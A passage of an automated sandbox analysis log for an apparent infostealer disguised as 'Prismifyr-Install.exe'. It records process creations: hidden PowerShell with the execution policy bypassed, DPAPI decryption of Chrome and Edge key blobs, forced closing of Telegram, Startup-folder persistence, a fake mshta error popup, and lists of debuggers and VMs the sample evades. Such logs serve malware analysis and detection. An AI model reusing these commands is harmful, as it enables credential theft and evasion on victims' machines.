      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
      Source: Prismifyr-Install.exe, 00000000.00000003.67651932030.0000024BF83AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NE 6.9.EXE","CHEAT ENGINE 7.0.EXE","CHEAT ENGINE 7.1.EXE","CHEAT ENGINE 7.2.EXE","OLLYDBG.EXE","WIRESHARK.EXE","IMMUNITYDEBUGGER.EXE","WINDBG.EXE","IDA PRO.EXE","
      Source: Prismifyr-Install.exe, 00000000.00000003.67651932030.0000024BF83AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BUGGER.EXE","HTTP DEBUGGER PRO.EXE","FIDDLER.EXE","KSDUMPERCLIENT.EXE","KSDUMPER.EXE","FOLDERCHANGESVIEW.EXE","BINARYNINJA.EXE","CHEAT ENGINE 6.8.EXE","CHEAT ENGI
      Source: Prismifyr-Install.exe, 00000000.00000003.67553148430.0000024BF8178000.00000004.00000020.00020000.00000000.sdmp, Prismifyr-Install.exe, 00000000.00000003.67541774873.0000024BF8178000.00000004.00000020.00020000.00000000.sdmp, Prismifyr-Install.exe, 00000000.00000003.67591119175.0000024BF8178000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HERE.EXE","FIDDLER.WEBUI.EXE","HTTPDEBUGGERUI.EXE","HTTPDEBUGGERSVC.EXE","HTTPDEBUGGERPRO.EXE","X64DBG.EXE","IDA.EXE","IDA64.EXE","PROGRESS TELERIK FIDDLER WEB DE
      Source: Prismifyr-Install.exe, 00000000.00000003.67651932030.0000024BF83AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CHEAT ENGINE.EXE","SYSINTERNALS SUITE.EXE","PROCESS EXPLORER.EXE","PROCESS MONITOR.EXE","REGMON.EXE","FILEMON.EXE","TCPVIEW.EXE","AUTORUNS.EXE","DUMPCAP.EXE","PRO
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeMemory allocated: 11E0000 memory reserve | memory write watch
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeMemory allocated: 1AC30000 memory reserve | memory write watch
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeMemory allocated: 2980000 memory reserve | memory write watch
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeMemory allocated: 1ABB0000 memory reserve | memory write watch
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9920Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9937
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9895
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9888
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9847
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9904
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9913
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9913
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9904
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9919
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.dllJump to dropped file
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\prebuilds\win32-x64\node.napi.nodeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mydyhibp.dllJump to dropped file
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6668Thread sleep count: 9920 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5904Thread sleep count: 9937 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 904Thread sleep count: 9895 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3616Thread sleep count: 9888 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3232Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5904Thread sleep count: 9847 > 30
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe TID: 7004Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5364Thread sleep count: 9904 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5240Thread sleep count: 9913 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5616Thread sleep count: 9913 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1912Thread sleep count: 9904 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep count: 9919 > 30
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe TID: 6212Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
      Source: Prismifyr-Install.exe, 00000000.00000003.67635828143.0000024BF84DC000.00000004.00000020.00020000.00000000.sdmp, Prismifyr-Install.exe, 00000000.00000003.67635426227.0000024BF84DC000.00000004.00000020.00020000.00000000.sdmp, Prismifyr-Install.exe, 00000000.00000003.67652779361.0000024BF84DF000.00000004.00000020.00020000.00000000.sdmp, Prismifyr-Install.exe, 00000000.00000003.67650202707.0000024BF84EB000.00000004.00000020.00020000.00000000.sdmp, Prismifyr-Install.exe, 00000000.00000003.67637676417.0000024BF84DC000.00000004.00000020.00020000.00000000.sdmp, Prismifyr-Install.exe, 00000000.00000003.67648901079.0000024BF84DC000.00000004.00000020.00020000.00000000.sdmp, Prismifyr-Install.exe, 00000000.00000003.67631554195.0000024BF84DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
      Source: Prismifyr-Install.exe, 00000000.00000003.67651932030.0000024BF83AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ","KVM","Microsoft Hv","VMwareVMware","XenVMMXenVMM","prl hyperv"]
      Source: Prismifyr-Install.exe, 00000000.00000003.67651932030.0000024BF83AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ["Microsoft Remote Display Adapter","Microsoft Hyper-V Video","Microsoft Basic Display Adapter","VMware SVGA 3D","Standard VGA Gr7
      Source: Prismifyr-Install.exe, 00000000.00000003.67631554195.0000024BF84DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware8
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
      Source: curl.exe, 00000008.00000003.67597580676.00000181039B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe, type: DROPPED
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1"
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1""Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber""Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser')"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Telegram.exe /F"Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\202491-1172-1ubrsvu.jrfa.png" "Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()""Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""Jump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.cmdline"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5D70.tmp" "c:\Users\user\AppData\Local\Temp\1d1qdkxo\CSC52BD52076B74273B09B644FAD90AB4F.TMP"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revokeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversionJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:listJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "Speed"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /fo csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser')
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Telegram.exe /F
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\202491-1172-1ubrsvu.jrfa.png"
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2DC.tmp" "c:\Users\user\AppData\Local\Temp\screenCapture\CSC4B6917784BAC4B77A38513830EABEA.TMP"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\vi0IK.ps1""
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber""
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser')"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Telegram.exe /F"
